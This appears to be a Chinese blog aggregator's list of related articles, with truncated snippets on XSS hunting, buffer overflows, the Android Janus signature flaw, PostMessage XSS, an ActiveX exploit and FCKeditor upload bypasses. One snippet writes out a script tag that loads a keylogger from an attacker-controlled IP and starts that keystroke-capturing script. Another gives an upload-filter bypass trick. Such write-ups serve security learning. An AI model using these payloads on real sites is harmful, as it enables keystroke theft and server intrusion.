一次xss的黑盒挖掘和利用过程】的更多相关文章

挖掘过程一: 自从上一次投稿,已经好久好久没写文章了.今天就着吃饭的时间,写篇文章,记录下自己学习xss这么久的心得.在我看来.Xss就是javascript注入,你可以在js语法规定的范畴内做任何事情,js可谓强大,本次结合一次挖掘xss的过程和xss的综合利用来探讨,小菜一枚,希望大牛不吝赐教.文章里的网站打码,大家见谅 我们先看看网站 测试储存型xss的话,黑盒测试效果还可以.我们这里不讨论反射型的,反射型的,基本一些扫描工具就可以秒了.当然我们要在我们能看见的任何地方开始狂插,<scri…
0X0.前言 早上起床,打开手机习惯性刷刷新闻,却发现网络无法连接,本以为是光猫出现了问题,后来发现是忘记续费,欠费了. 在网上充值完之后,等了有将近十分钟,网依旧没恢复.随打了个电话给客服,客服在后台帮忙刷新了一下数据,一分钟后网络就恢复了. 在我打了个非常满意评价后,客服发了个短信给我,短信内容是这样子的. 点开链接,页面跳转一下,发现是一个客户自检网络,修复网络故障的页面.(上网账号和城市做了修改) 心想这里会不会有点什么呢? 搞事心态一起,那么就研究研究吧. 0x1.反射XSS的挖掘 抽…
缓冲区溢出攻击很容易被攻击者利用,因为 C 和 C++等语言并没有自动检测缓冲区溢出操作,同时程序编写人员在编写代码时也很难始终检查缓冲区是否可能溢出.利用溢出,攻击者可以将期望数据写入漏洞程序内存中的任意位置,甚至包括控制程序执行流的关键数据(比如函数调用后的返回地址),从而控制程序的执行过程并实施恶意行为. 缓冲区溢出的常用攻击方法是将恶意代码 shellcode 注入到程序中,并用其地址来覆盖程序本身函数调用的返回地址,使得返回时执行此恶意代码而不是原本应该执行的代码.也就是说,这种攻击在…
近日,Google在12月发布的安卓系统安全公告中披露了一个名为"Janus"安卓漏洞(漏洞编号:CVE-2017-13156).该漏洞可以让攻击者绕过安卓系统的signature scheme V1签名机制,进而直接对App进行篡改.而且由于安卓系统的其他安全机制也是建立在签名和校验基础之上,该漏洞相当于绕过了安卓系统的整个安全机制.   一旦攻击者将植入恶意代码的仿冒的App投放到安卓商店等第三方应用市场,就可替代原有的App做下载.更新.网友安装这些仿冒App后,不仅会泄露个人账…
XSS 原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 [反射型漏洞利用] 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali 客户端 启动apache2服务:service apache2 start 语法:<script src="http://192.168.1.127/keylogger.js"></script> keylogger.js document.onkeypress = function(evt) { ev…
PostMessage xss很有趣,在国外出现了很多次,国内src/众测从没遇到过,挖到过.可能境界还不够,有机会再去试试.好几年前记得心血来潮学过一次,都是半知半解,后来因为重要性不高,不了了之了,今天重新捡起来. PostMessage的含义:参考MDN: Window.postmessage()方法可以安全地实现Window对象之间的跨源通信;例如,在页面和它派生的弹出窗口之间,或者在页面和其内嵌的iframe之间. 简单点来说,我是这样理解的:发送相应数据到目标页面,目标页面接收传输的…
前言 大学英语会用到一个 ActiveX 插件 LearnX ,最近从网上下了一个下来分析了一下,找到了一些漏洞并完成了 exploit . 虽然涉及的知识比较老旧,不过还是挺有意思的.这里分享一下整个过程. 相关文件 链接: https://pan.baidu.com/s/1jfDIInXD4k1nGOeCghEGDg 提取码: dmm6 解压密码:9179ee68791ae58187eb30837370aae4 正文 分析准备 首先在网上下载了一个安装程序,下载并安装到电脑上. https:…
XSS的简单介绍 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户目的. XSS危害: 流量劫持 获取用户cookie信息,盗取账号 篡改.删除页面信息(钓鱼) 配合CSRF攻击,实施进一步攻击 XSS分类 反射型XSS:反射型XSS也被称…
http://www.pkav.net/XSS.png?from=timeline&isappinstalled=0…
查看编辑器版本号 FCKeditor/_whatsnew.html ------------------------------------------------------------- 2. Version 2.2 版本号 Apache+linux 环境下在上传文件后面加个.突破!測试通过. ------------------------------------------------------------- 3.Version <=2.4.2 For php 在处理PHP 上传的地方…